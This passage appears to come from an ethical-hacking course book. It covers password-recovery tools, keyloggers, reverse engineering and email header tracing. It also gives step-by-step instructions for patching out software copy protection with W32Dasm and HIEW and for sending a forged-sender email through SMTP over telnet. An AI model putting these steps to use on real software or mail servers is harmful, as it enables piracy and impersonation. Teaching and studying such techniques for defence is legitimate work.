If the minimum and maximum lengths are not the same, the program tries the shorter
passwords first. For example, if you set minimum=3 and maximum=7, the program will
start from 3-character passwords, then try 4-character ones and so on – up to 7. While
APDFPR is running, it shows the current password length, as well as the current
password, average speed, elapsed and remaining time, and total and processed
number of passwords (Program status). All of this information except average speed
and elapsed time, which are global, is related only to the current length.
5.9.1.5 Dictionary options
Simply select the desired wordlist file. In addition, you can select an option Smart
mutation or Try all possible upper/lower case combinations – it may really help if you're
not sure about the register the password has been typed in. For example, let's assume
that the next word in the wordlist is "PASSword" (the case, actually, doesn't matter
here). With the second option enabled, the program will just try all possible
combinations, like Advance Office Password Recovery software.
5.9.1.6 Key search
If the PDF file has both user and owner passwords and they are long and complex, you
have nothing to do but try this attack. It tries all possible RC4 encryption keys until it
finds the right one, and allows decrypting the file using that key – the resulting PDF file
will have no security at all. That method gives 100% success.
In PDF 1.2/1.3 files (Acrobat 4.x or older), the key length in 40 bits, and so the total
number of keys is 2^40, or 1,099,511,627,776. All key space is divided into 65,536
blocks, with 16,777,216 in a block; the whole recovery process takes about 30 days on
old and slow PIII-450 computer, and just 3-5 days on modern Intel Core 2 Duo
processors.
You have to select the block to start from (Start from block input box) and ending block
(End at block box); both values could be from 0 to 65536. During the attack, the
program shows the number of the current block; time elapsed, average speed (in keys
per second), number of keys already processed and the total number of keys.
_______________________________________________________________________________________
When the key is found, the program shows it and asks you to decrypt the file; if you
already know the key, just put it into the Document key input box and press Decrypt
button at the right.
With the Enterprise version of APDFPR, you can seriously speed-up this attack by
enabling Use pre-computed hash tables’ option; press Select user hashes directory
button at the right and browse for the folder where the tables are located. This folder
should contain the following folders/files (Thunder tablestm):
0\t00_l17000.data
0\t00_l17000.index
1\t01_l17000.data
1\t01_l17000.index
2\t02_l17000.data
2\t02_l17000.index
3\t03_l17000.data
3\t03_l17000.index
4\t04_l17000.data
4\t04_l17000.index
5\t05_l17000.data
5\t05_l17000.index
missing.bin
It is NOT recommended to use the tables directly from DVD (shipped with Enterprise
version) because of very slow DVD drive performance. You can copy the DVD contents
to the hard drive, or even better, to USB flash drive. USB flash drives have relatively low
performance when reading files, but much better (than hard drive) random seek time,
while this parameter is the most important for this attack.
With hash tables on hard drive, this attack takes from 10 to 30 minutes to complete; on
USB flash drives – from just a few seconds and up to 10-15 minutes (worst case). This
option also provides guaranteed recovery.
Finally, please note that Adobe Acrobat 5.0 and later (including the latest version, 8.0)
can create PDF files with improved security level: 56..128-bit RC4 encryption (PDF 1.4
specification; look at New feature highlights document on Adobe server), and so that
attack is not applicable to them (you will get an error message).
_______________________________________________________________________________________
5.9.1.7 Auto-save
If you'd like APDFPR to save its state periodically, please check the appropriate option,
and select the time (in minutes) between saves. If you do that, APDFPR will create and
periodically update a restore file named "~apdfpr.axr" (that's the default – you can
change it) in the same folder where your document is located (also by default; you can
select any other folder to save that file to). This file is similar to one created when using
the "Save setup" button. Even if your computer stops responding (or if power fails), you'll
be able to restore breaking the password from the last saved state. Instead of using the
default settings (the name of the file and the folder it will be saved to), you can also
select your own settings. Enabling this option is strongly recommended.
5.10 RAR Password Recovery_____________________
RAR Password Recovery is a powerful tool to recover lost (forgotten) passwords for a
RAR/WinRAR (2.xx and 3.xx) archives. The program supports the "brute-force" attack,
dictionary-based attack and dramatically fastest "Booost-Up" attack. The program is
able to resume the previous interrupted attack.
Figure: 5.11
_______________________________________________________________________________________
Here is a brief list of RAR Password Recovery advantages:
1. Recovers passwords for a RAR/WinRAR archives of versions 2.xx and 3.xx using
combination of Brute-Force, Booost-Up or Dictionary attacks.
2. Very high speed of work (more than 3000 passwords per second in Brute-Force
mode and up to 22000 passwords per second in Booost-Up mode).
3. Customizability.
4. Advanced heuristic processor.
5. User-friendly interface.
6. Large wordlist dictionary.
7. Ability to work in the background.
8. Autosave feature.
5.11 FTP Password Recovery_____________________
Advanced FTP Password Recovery is a program that will catch, sniff and show your
forgotten FTP passwords. This FTP password finder is very easy to use and can
recover passwords from all FTP clients including CuteFTP, WS_FTP, FileZilla,
SmartFTP, FlashFXP and Bulletproof FTP.
Advanced FTP Password Recovery can intercept and find FTP passwords from
the following FTP clients:
Figure: 5.12
_______________________________________________________________________________________
CuteFTP password decrypter
WS FTP password recovery
FileZilla FTP password cracker
SmartFTP password
FlashFXP password
Bulletproof FTP password interceptor
LeechFTP password
FTP Explorer password decoder
Core FTP password sniffer
AceFTP password
FTP Voyager password ripper
FTP Commander account hacker
CoffeeCup FTP password finder
Website Publisher password
SecureFX password
FTPRush password
FTP Navigator password
FTP Express password and many many others...
Extra recovery features:
All versions of FTP clients are supported
Support for multiple FTP accounts
Works through any Firewall
Opens alternative port if port 21 is used by another program
Recovery guaranteed!
Download FTP Password Recovery
_______________________________________________________________________________________
How this FTP password Recovery works:
FTP protocol was developed a long time ago, when the security was not such a big
issue as is now. Hence, the data transfer in FTP protocol is unencrypted. Text
information including FTP passwords is sent in plain-text format and anyone who
intercepts the connection (e.g. sniffs the local area network) is able to see these
passwords.
This program works by emulating the FTP server and recording the passwords it
receives.
It means, once you run FTP Password Recovery, you will see passwords of anyone who
connects to your computer on port 21 with an ftp client.
All you need to do is load the FTP Password Recovery and connect with your ftp client
to it.
How to use Advanced FTP Password Recovery:
1. Download FTP Password Recovery
2. Run the downloaded file and install FTP Password Recovery,
3. make sure you select Run Advanced FTP Password Recovery checkbox at the
end of your setup
4. Open your FTP Client
5. Open connection properties (e.g. account manager)
6. Remember current FTP server address
7. We advise you to write it down
8. Change FTP server address to local host
9. Change port to 21 (or 22, as indicated in Advanced FTP Password Recovery
window)
10. Repeat this for all necessary servers
11. Confirm changes
12. Try to connect to each server
13. You will see captured passwords in Advanced FTP Password Recovery window
14. Change back the original server addresses in your FTP client
_______________________________________________________________________________________
5.12 Countermeasures___________________________
The best defense against weak file password protection is to require your users to use a
stronger form of file protection, such as PGP, when necessary.
Ideally, you don’t want to rely on users to make decisions about what they should use
this method to secure, but it’s better than nothing. Stress that a file-encryption
mechanism such as PGP is secure only if users keep their passwords confidential and
never transmit or store them in clear text.
If you’re concerned about non-secure transmissions through e-mail, consider one of
these options:
Block all outbound e-mail attachments that aren’t protected on your e-mail server.
Use an encryption program, such as PGP, to create self-extracting encrypted
files.
Use content-filtering applications.
5.13 Other ways to crack passwords_______________
Over the years, I’ve found other ways to crack passwords, both technically and through
social engineering.
5.13.1 Keystroke logging
One of the best techniques for cracking passwords is remote keystroke
Logging — the use of software or hardware to record keystrokes as they’re being typed
into the computer.
Be careful with keystroke logging. Even with good intentions, monitoring employees can
raise some legal issues. Discuss what you’ll be doing with your legal counsel, and get
approval from upper management.
5.13.2 Logging tools
With keystroke-logging tools, you can later assess the log files of your application to see
what passwords people are using:
Keystroke-logging applications can be installed on the monitored computer. It is
recommended that you check out eBlaster and Spector Pro by SpectorSoft
(www.spectorsoft.com).
Another popular tool that you can use is Invisible Key Logger Stealth, at
www.amecisco.com/iks.htm, as well as the hardware-based Key Ghost
(www.keyghost.com). Dozens of other such tools are available on the Internet.
_______________________________________________________________________________________
Hardware-based tools fit between the keyboard and the computer or replace the
keyboard altogether.
A shared computer can capture the passwords of every user who logs in.
Figure: 5.13
The best defense against the installation of keystroke-logging software on your systems
is a spyware-detection program or popular antivirus products.
The potential for hackers to install keystroke-logging software is another reason to
ensure that your users aren’t downloading and installing random shareware or opening
attachments in unsolicited e-mails. Consider locking down your desktops by setting the
appropriate user rights through local or group security policy in Windows. Alternatively,
you could use a commercial lock-down program, such as Fortres 101 (www.fortres.com)
for Windows or Deep Freeze (www.deepfreezeusa.com) for Windows and Mac OS X.
5.13.3.1 Weak password storage
Many legacy and stand-alone applications such as e-mail, dial-up network connections,
and accounting software store passwords locally, making them vulnerable to password
hacking. By performing a basic text search, I’ve found passwords stored in clear text on
the local hard drives of machines.
_______________________________________________________________________________________
5.13.3.2 Searching
You can try using your favorite text-searching utility — such as the Windows search
function, findstr, or grep — to search for password or passwd on your drives. You may
be shocked to find what’s on your systems. Some programs even write passwords to
disk or leave them stored in memory. This is a hacker’s dream. Head it off if you can.
The only reliable way to eliminate weak password storage is to use only applications
that store passwords securely. This may not be practical, but it’s your only guarantee
that your passwords are secure.
5.14 Good password practice_____________________
Password policies often include advice on proper password management such as:
Never sharing a computer account.
Never using the same password for more than one account.
Never telling a password to anyone, including people who claim to be from
customer service or security.
Never writing down a password.
Never communicating a password by telephone, e-mail or instant messaging.
Being careful to log off before leaving a computer unattended.
Changing passwords whenever there is suspicion they may have been
compromised.
Windows password and application passwords are different.
Password should be alpha-numeric.
_______________________________________________________________________________________
Chapter-6
Reverse Engineering & Cracking
Techniques
Session Objectives:
Reverse Engineering
Reverse Engineering and Other Types of Engineering
Stages Involved In the Reverse Engineering Process
Disassembly or Decompilation
Source Code and Object Code
Uses of Reverse Engineering
Reverse Engineering
How to Crack Any Type of Software Protection
Tool: Hex Workshop
_______________________________________________________________________________________
6.1 Introduction_________________________________
Reverse engineering is the general process of analyzing a technology specifically to
ascertain how it was designed or how it operates. This kind of inquiry engages
individuals in a constructive learning process about the operation of systems and
products. Reverse engineering as a method is not confined to any particular purpose,
but is often an important part of the scientific method and technological development.
The process of taking something apart and revealing the way in which it works is often
an effective way to learn how to build a technology or make improvements to it.
Through reverse engineering, a researcher gathers the technical data necessary for the
documentation of the operation of a technology or component of a system. In "black
box" reverse engineering, systems are observed without examining internal structure,
while in "white box" reverse engineering the inner workings of the system are inspected.
When reverse engineering software, researchers are able to examine the strength of
systems and identify their weaknesses in terms of performance, security, and
interoperability. The reverse engineering process allows researchers to understand both
how a program works and also what aspects of the program contribute to its not
working. Independent manufacturers can participate in a competitive market that
rewards the improvements made on dominant products. For example, security audits,
which allow users of software to better protect their systems and networks by revealing
security flaws, require reverse engineering. The creation of better designs and the
interoperability of existing products often begin with reverse engineering.
6.2 Reverse Engineering and other types of
Engineering
The most traditional method of the development of a technology is referred to as
"forward engineering." In the construction of a technology, manufacturers develop a
product by implementing engineering concepts and abstractions. By contrast, reverse
engineering begins with final product, and works backward to recreate the engineering
concepts by analyzing the design of the system and the interrelationships of its
components.
Value engineering refers to the creation of an improved system or product to the one
originally analyzed. While there is often overlap between the methods of value
engineering and reverse engineering, the goal of reverse engineering itself is the
improved documentation of how the original product works by uncovering the underlying
design. The working product that results from a reverse engineering effort is more like a
duplicate of the original system, without necessarily adding modifications or
improvements to the original design.
_______________________________________________________________________________________
6.3 Stages involved in the Reverse Engineering
Process
Since the reverse engineering process can be time-consuming and expensive, reverse
engineers generally consider whether the financial risk of such an endeavor is
preferable to purchasing or licensing the information from the original manufacturer, if
possible.
In order to reverse engineer a product or component of a system, engineers and
researchers generally follow the following four-stage process:
1. Identifying the product or component which will be reverse engineered
2. Observing or disassembling the information documenting how the original
product works
3. Implementing the technical data generated by reverse engineering in a replica or
modified version of the original
4. Creating a new product (and, perhaps, introducing it into the market)
In the first stage in the process, sometimes called "prescreening," reverse engineers
determine the candidate product for their project. Potential candidates for such a project
include singular items, parts, components, units, subassemblies, some of which may
contain many smaller parts sold as a single entity.
The second stage, disassembly or decompilation of the original product, is the most
time-consuming aspect of the project. In this stage, reverse engineers attempt to
construct a characterization of the system by accumulating all of the technical data and
instructions of how the product works.
In the third stage of reverse engineering, reverse engineers try to verify that the data
generated by disassembly or decompilation is an accurate reconstruction the original
system. Engineers verify the accuracy and validity of their designs by testing the
system, creating prototypes, and experimenting with the results.
The final stage of the reverse engineering process is the introduction of a new product
into the marketplace. These new products are often innovations of the original product
with competitive designs, features, or capabilities. These products may also be
adaptations of the original product for use with other integrated systems, such as
different platforms of computer operating systems.
Often different groups of engineers perform each step separately, using only documents
to exchange the information learned at each step. This is to prevent duplication of the
original technology, which may violate copyright. By contrast, reverse engineering
creates a different implementation with the same functionality.
_______________________________________________________________________________________
6.4 Disassembly or Decompilation_________________
In the development of software, the source code in which programmers originally write is
translated into object (binary) code. The translation is done with a computer program
called an "assembler" or "compiler," depending on the source code's language, such as
Java, C++, or assembly. A great deal of the original programmer's instructions, including
commentary, notations, and specifications, are not included in the translation from
source to object code (the assembly or compilation).
Disassembly or decompilation reverses this process by reading the object code of the
program and translating them into source code. By presenting the information in a
computer language that a software programmer can understand, the reverse engineer
can analyze the structure of the program and identify how it operates.
The data generated in the disassembly of a typical computer program is one to many
files with thousands of lines of computer code. Because much of the original
programmer's commentary, notations, and specifications are not retained in the object
code, the reverse engineered code constitutes only a part of the program information
included in the original source code. Engineers must interpret the resulting source code
using knowledge and expertise to recreate the data structures of the original program
and understand the overall design rationale of the system.
Not all reverse engineering efforts require "decompilation" of software. Some "black box"
reverse engineering is done by characterizing software through observation of its
interaction with system components, other software, and other (external) systems
through networks.
6.5 Source Code and Object Code__________________
Source code is the category of computer language instructions that is most frequently
written and read by software programmers. A computer cannot generally run a program
in source code form though. The source code is translated, with the use of an assembler
or compiler, into a language form that contains instructions to the computer known as
object code. Object code consists of numeric codes specifying each of the computer
instructions that must be executed, as well as the locations in memory of the data on
which the instructions are to operate.
While source code and object code are commonly referred to as different classes of
computer language, these terms actually describe the series of transformations a
program goes through when being converted from a higher level language more easily
comprehensible to humans to the lower level language of computer operations.
_______________________________________________________________________________________
6.6 Uses of Reverse Engineering
A common misperception regarding reverse engineering is that it is used for the sake of
stealing or copying someone else's work. Reverse engineering is not only used to figure
out how something works, but also the ways in which it does not work.
Some examples of the different uses of reverse engineering include:
1. Understanding how a product works more comprehensively than by merely
2.
3.
4.
5.
6.
7.
8.
observing it
Investigating and correcting errors and limitations in existing programs
Studying the design principles of a product as part of an education in engineering
Making products and systems compatible so they can work together or share
data
Evaluating one's own product to understand its limitations
Determining whether someone else has literally copied elements of one's own
technology
Creating documentation for the operation of a product whose manufacturer is
unresponsive to customer service requests
Transforming obsolete products into useful ones by adapting them to new
systems and platforms
6.7 Reverse Engineering__________________________
6.7.1 HOW TO CRACK ANY TYPE OF SOFTWARE
PROTECTION
In this tutorial you will learn how to crack any type of software protection using
W32Dasm and HIEW.
6.7.1.1 IDENTIFYING THE PROTECTION:
Run the program, game, etc., (SoftwareX) that you want to crack without the CD in the
CD reader. SoftwareX will not run of course, however, when the error window pops up it
will give you all of the vital information that you need to crack the program, so be sure to
write down what it says.
6.7.1.2 CRACKING THE PROTECTION:
Now, run Win32Dasm. On the file menu open DISASSEMBLER > OPEN FILE TO
DISASSEMBLE. Select SoftwareX’s executable file in the popup window that will appear
(e.g. SoftwareX.exe). W32Dasm may take several minutes to disassemble the file.
_______________________________________________________________________________________
When W32Dasm finishes disassembling the file it will display unrecognizable text; this is
what we want. Click on the String Data References button. Scroll through the String
Data Items until you find SoftwareX’s error message. When you locate it, double click
the error message and then close the window to return to the Win32Dasm text. You will
notice that you have been moved somewhere within the SoftwareX’s check routine; this
is where the error message in generated.
Now comes the difficult part, so be careful. To crack SoftwareX’s protection you must
know the @offset of every call and jump command. Write down every call and
jump@offset number that you see (You have to be sure, that the OPBAR change its
used color to green). You need the number behind the @offset without the “h.”
Now open HIEW, locate SoftwareX’s executable, and press the F4 key. At this point a
popup window will appear with 3 options: Text, Hex, and Decode. Click on “Decode” to
see a list of numbers. Now press the F5 key and enter the number that was extracted
using Win32Dasm. After you have entered the number you will be taken to SoftwareX’s
check routine within HIEW.
To continue you must understand this paragraph. If the command that you are taken to
is E92BF9BF74, for example, it means that the command equals 5 bytes. Every 2 digits
equal one byte: E9-2B-F9-BF-74 => 10 digits => 5 bytes. If you understood this then you
can continue.
Press F3 (Edit), this will allow you to edit the 10 digits. Replace the 5 bytes with the
digits 90. In other words, E92BF9BF74 will become 9090909090 (90-90-90-90-90).
After you complete this step press the F10 key to exit.
Congratulations! You just cracked SoftwareX!
Don’t panic if SoftwareX will not run after you finished cracking it. It only means that
something was done incorrectly, or perhaps SoftwareX’s protection technology has
been improved or created after this tutorial. Simply reinstall SoftwareX and start over. If
you’re sure that you completed all steps correctly and the program still will not run then
tough nuts. Their protection was developed after the writing of this tutorial.
6.7.2 TOOL: HEX WORKSHOP
Hex Workshop, the Professional Hex Editor, is a file and disk editor which runs on
Windows 3.1, Windows 95, and Windows NT. Hex Workshop was designed by
programmers for programmers and does not double as a text editor. Both the 16 bit and
32 bit version are available for only $20.
_______________________________________________________________________________________
With Hex Workshop you can:
1. Edit multiple files of unlimited size.
2. Edit Floppy and Hard Disks on Windows 3.1, 95, and NT.
3. Hex Edit files directly from the File Manager or Windows 95 Desktop.
4. Cut Copy, Paste, Insert, Delete, and Undo.
5. Find and Replace Hex or ASCII values.
6. Goto from the start, end, or cursor position within a file or disk.
7. Use the Compare Tool to find differences in files.
8. Calculate Checksums for all or part of a file.
9. Search across multiple sectors on a Disk.
10. Print high quality hex dumps.
11. Get File/Disk properties with the click of the mouse.
12. View File/Disk attributes in the Status Bar.
13. Use Keycuts to access most features with function keys.
14. Use online help including an ASCII table and list of data types.
15. And you get two additional applets:
1. A Base Converter to convert between hex/decimal/binary.
2. A Hex/Decimal Calculator (supporting +, -, *, /, &, ^, >>, <<, ~).
_______________________________________________________________________________________
Let’s take a game and apply reverse engineering on it
Open the margames.exe and finally after exiting u will get the following window.
Figure 6.1
Before editing, take the backup of margames.exe because while editing there are lots of
chances of file being corrupted.
Now open the margames.exe in hex workshop editor and try to find “klik & play” and
replace with the name “ANUP GIRDHAR” Save the file.
_______________________________________________________________________________________
Figure 6.2
Lets again play the game and after exiting we will get the following window
23
Figure 6.3
_______________________________________________________________________________________
NOTES
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
_______________________________________________________________________________________
Chapter-7
E-Mail Hacking & Countermeasures
Session Objectives:
Sending E-Mail via Telnet
E-Mail Tracing Case
Converting an IP Address into a Name
Converting a Domain Address
Tools for Email Tracing
_______________________________________________________________________________________
Introduction____________________________________
Email Hacking is the one of the biggest request through out the world either for ethical
or non ethical hackers or anyone, There are many sites which gives you the surety that
they can hack your email ID’s.
There are many concept, Tools, Strategy, scripts, techniques etc. by which yes it is
possible how to retrieve the email password.
Let us discuss the biggest loop hole in our Email System i.e.
Transfer Protocol) via port 25.
SMTP (Simple Mail
If we are receiving or sending the mail it has been take care by the protocol i.e. SMTP
and generally via port 25 where if we can receive the normal mail then why not the
Forged mails Here we are demonstrating you by using the Software Telnet and
approaching to one of the Website i.e. www.anupgirdhar.net and once we scan the port
we got to know that the port 25 is open and lets try to send the mail by using the Email
ID of “Bilgates [email protected] to Mr. Anup Girdhar on his email ID i.e
[email protected]
7.1 Sending e-mail via Telnet______________________
Just as in POP3 connection, when you click on the 'Send' button, your e-mail client
contacts the SMTP server of your mail service / ISP. It then uses a set of commands to
transmit your e-mail. What we are going to do is try these commands ourselves, and get
a first-hand experience of how things work. SMTP servers usually have the DNS
address: smtp.<your_isp>.com, or mail.<web_mail_address>.com. Some samples are:
mail.monitortools.com, mail.adminfavorites.com.
In this document, we:
#
#
#
Shall use Telnet to connect to the SMTP server.
Shall give commands to the server, then type our e-mail, and finally tell the
server, 'Okay, the e-mail is done. Send it.
Can then send more mails, or disconnect from the server.
The steps are quite similar to what you do when you send an e-mail from - for instance Outlook Express. We are going to use the SMTP server of monitortools.com with the ID
'webmaster'.
_______________________________________________________________________________________
Step-1
Connect to the Internet in case you are a dial-up user. Open an MS-DOS prompt, and
enter this command:
C:\>telnet www.anupgirdhar.net 25
This will open a Telnet window, and within a short time, you will be connected to the
SMTP server, and the server says:
Figure: 7.1
This varies, but you should definitely see the '220' part. It is an indication that the server
is ready to service your request.
Step-2
Now the server expects you to identify yourself. If you are a dial-up user, you can enter
the name of your computer (the one Windows asks you when you install Windows) or
anything else you want. If you have a domain-name, then you should enter the domainname here, but we skip to write any computer name and intentionally kept this blank
helo
! Note that it is 'helo' and not 'hello'. The commands are not case-sensitive, so you can also say
HeLo or HELO or hELo. The server replies:
Figure: 7.2
This is like a shake-hand. You tell the server your name, and it says its name!
Computers are quite friendly, you see!
_______________________________________________________________________________________
Step-3
Next give any e-mail address.
mail from: [email protected]
'mail from:' is a SMTP command.
!
Note that there is a space between 'mail' and 'from', followed by a colon (:). The
server says:
Figure: 7.3
Step-4
Tell the server who you want to send the e-mail to.
!
Note that most SMTP servers require that your e-mail address belong to the same
domain as the server. For example, if you send mail from Yahoo! SMTP server, you
should have a Yahoo! address. You cannot use it if you give it a Hotmail address. Let
me give the SMTP servers some e-mail address. Let me send a mail to:
rcpt to: [email protected]
Figure: 7.4
_______________________________________________________________________________________
Step-5
You have told the server your e-mail address, and the recipient's e-mail address, so now
you can go ahead and type the e-mail header where it may be any time any date etc..
You have to do that with the data command:
data
The server asks you to go ahead with your e-mail:
Figure: 7.5
Don't worry with the thing. It'll be explained later.
Step-6
Now type in your e-mail, like this:
Figure: 7.6
_______________________________________________________________________________________
CTRL-h. If it works, well and good.
.
When you finish your e-mail, press [ENTER], then a '.', and again an [ENTER]. This tells
the server that you have finished the e-mail, and it can send it. It will say:
250 Ok: queued as 6AB5150038
Your mail was sent!
Step-7
Now you can either send another mail, or disconnect from the server. If you want to
send another mail, you should repeat the 'rcpt to:' and 'data' commands. There is no
need for 'helo' and 'mail from:', because the server already knows who you are. If you
want to disconnect, just say 'quit':
quit
The server will reply:
221 Connection to Host lost.
and you will lose connection with the server. Hurray, you sent a mail direct from the
server! Try this in front of your friends who may be used to only GUIs and icons. They
will begin to call you up for technical support!
7.2 E-mail Tracing case___________________________
#
#
Every email has a so-called header. The header is the part in which the route the
email has taken is described.
The header is normally hidden by the email programme. Every email programme
can display them, though (look into the "Options" or "Preferences" menu).
Figure: 7.7
_______________________________________________________________________________________
7.2.1 Header Protocol
#
#
#
When an e-mail message is sent, the user typically controls only the recipient
line(s) (To:, Cc and Bcc:) and the Subject: line.
Mail software adds the rest of the header information as it is processed.
Along the e-mails route a server can add or delete lines (anonymous re-mailer)
7.2.1.1 Sample header
1. Return-Path: <[email protected]>
2. Received: from mailhub-1.net.treas.gov ([10.7.14.10]) by nccmail.usss.treas.gov
for <[email protected]>;Fri, 18 Feb 2000 11:46:07 -0500
3. Received: from mx-relay.treas.gov ([199.196.144.6]) by tias4.net.treas.gov
via smtpid (for mailhub.net.treas.gov [10.7.8.10]) with SMTP; 18 Feb 2000 16:55:44
4. Received: from hotmail.com (f7.law4.hotmail.com [216.33.149.7]) by mx-relay2.treas.gov
for <[email protected]>; Fri, 18 Feb 2000 11:55:44 -0500 (EST)
5. Message-ID: <[email protected]>
6. Received: from 199.196.144.42 by www.hotmail.com with HTTP; Fri, 18 Feb 2000 08:55:43
7. X-Originating-IP: [199.196.144.42]
8. From: “Secret" <[email protected]>
9. To: [email protected]
10. CC: [email protected]
1. Return-Path
Line (1) tells other computers who really sent the message, and where to send error messages (bounces
and warnings).
2. Received: from mailhub-1.net.treas.gov ([10.7.14.10])
by nccmail.usss.treas.gov
for <[email protected]>;Fri, 18 Feb 2000 11:46:07 -0500
3. Received: from mx-relay.treas.gov ([199.196.144.6])
by tias4.net.treas.gov via smtpd (for mailhub.net.treas.gov [10.7.8.10])
with SMTP; 18 Feb
2000 16:55:44
4. Received: from hotmail.com (f7.law4.hotmail.com [216.33.149.7]) by
_______________________________________________________________________________________
mx-relay2.treas.gov for <[email protected]>; Fri, 18 Feb 2000
11:55:44 -0500 (EST)
#
#
Lines (2), (3) and (4)show the route the message took from sending to delivery.
Each computer that receives this message adds a Received: field with its complete address and
time stamp; this helps in tracking delivery problems.
Message-ID: <[email protected]>
#
Line (5) is the Message-ID, a unique identifier for this specific message. This ID is logged, and
can be traced through computers on the message route if there is a need to track the mail.
We want to trace this number
6. Received: from 199.196.144.42 by www.hotmail.com with HTTP;
Fri, 18 Feb 2000 08:55:43
#
#
Line (6) shows where the email was first received from with the IP address of the sender
Also show the date and time when the message was sent.
7. X-Originating-IP: [199.196.144.42]
#
#
Line (7) shows the originating IP address of the sender, but without the date and time the IP
address will not allow you to identify the specific user.
If the IP Address is a “Static” Address you WILL be able to identify the specific user. (most IP
Address are “dynamically” assigned)
We want to trace this domain name
8. From: “Secret" <[email protected]>
#
Line (8) tells the name and e-mail address of the message originator (the "sender").
9. To: [email protected]
Line (9) shows the name and e-mail address of the primary recipient; the address may be for a
– mailing list, ([email protected])
– system-wide alias, ([email protected])
– a personal username
10. CC: [email protected]
Line (10) lists the names and e-mail addresses of the "carbon copy" recipients of the message. There
may be "Bcc:" recipients as well; these "blind carbon copy" recipients get copies of the message, but their
names and addresses are not visible in the headers.
_______________________________________________________________________________________
7.3 Converting an ip address into a name___________
Figure: 7.8
7.4 Converting a Domain Address_________________
Figure: 7.9
_______________________________________________________________________________________
Figure: 7.10
Figure: 7.11
_______________________________________________________________________________________
7.4.1 Domain addressing
#
#
Similar in principle to postal address.
Example: for Jim Smith in the sales office of the company ABC in Australia, may
be:
[email protected]
#
Indicates that within the domain AU (internationally standardized code for the
country Australia) there is a subdomain ABC.AU, and within the subdomain
ABC.AU there is a further subdomain SALES.ABC.AU.
7.4.2 The outer most domain
#
#
Usually a two character country code (internationally).
Most of the e-mail addresses consists of one of the following three-character
codes:
COM Commercial companies
EDU Schools and universities
GOV Government agencies
INT
International organizations
MIL
Military organizations
NET
Network providers and gateways
ORG Not for profit organizations
7.5 Tools for E-mail Tracing_______________________
7.5.1 Ping (Packet InterNet Groper)
#
#
#
Is a protocol and program for sending a signal to see whether another network
host or other device is online and responding? The term is normally used as a
verb in "Ping [host] to see if it is up!"
Ping sends an ICMP (Internet Control Message Protocol) Echo packet to a
specified host, and waits for a response. It reports success or failure and
statistics about its operation. Ping is useful for testing and debugging networks.
It's also useful for determining the IP (Internet Protocol) address from a domain
name. To determine the domain name from an IP address you must use
nslookup
_______________________________________________________________________________________
Ping (Windows help file)
#
#
#
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] | [-k host-list]]
[-w timeout] destination-list
Options:
#
-t Ping the specified host until stopped.
To see statistics and continue - type Control-Break;
To stop - type Control-C.
#
#
#
#
#
#
#
#
#
#
#
-a Resolve addresses to hostnames.
-n count Number of echo requests to send. [count range is 1 to 4294967295]
-l size Send buffer size. [size range is from 0 to 65500]
-f Set Don't Fragment flag in packet.
-i TTL Time To Live. [TTL range is from 1 to 255]
-v TOS Type Of Service.
-r count Record route for count hops. [count range is 0 to 9]
-s count Timestamp for count hops. [count range is 1 to 4]
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.
-w timeout Timeout in milliseconds to wait for each reply.
Example Windows ping
#
C:\WINDOWS> ping yahoo.com
Pinging yahoo.com [216.115.108.245] with 32 bytes of data:
Reply from 216.115.108.245: bytes=32 time=31ms TTL=242
Ping statistics for 216.115.108.245: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 30ms, Maximum = 32ms, Average = 31ms
_______________________________________________________________________________________
NOTES
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
_______________________________________________________________________________________
NOTES
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
_______________________________________________________________________________________
Chapter-8
Malware Attacks & Countermeasures
Session Objectives:
Implications of Malware Attacks
Types of Malware
Hacking Tool: QAZ
Hacking Tool: NETCAT
Hacking Tool: Sub Seven
Hacking Tool: Donald Dick
Hacking Tool: NETBUS
Various Deadly Viruses
Indications of Infection
How Malware Propagates
Malware Countermeasures
_______________________________________________________________________________________
Introduction____________________________________
Malicious software (malware) has long been one of the biggest problems computer
users face. Viruses and worms have proved to be the biggest nuisances, but these
types of malware are ineffective if adequate controls are in place. On the other hand,
such types of malware as Trojan horses and rootkits can inflict serious harm against
computers and information, and are much harder to defend against.
8.1 Implications of Malware Attacks________________
Malware is one of the greatest threats to the security of your information. Not only do
you have to deal with the well-known malware — the ILoveYous and Code Reds of the
world — infecting your computers, but also, hackers are constantly developing new
ways to wreak havoc on systems. It seems that every month, widespread malware
attacks take place around the globe. The more recent attacks are mostly selfpropagating — which means that they need no user intervention to spread across
computer networks and the Internet.
These programs attack unpatched software and gullible users opening malicious e-mail
attachments
Most malware attacks — especially the recent ones — exploit well-known vulnerabilities
that should’ve been fixed months before the attacks occur.
Unfortunately, the general practice within IT and security is to install patches when
people get around to it. This is mostly because people either don’t make it a priority to
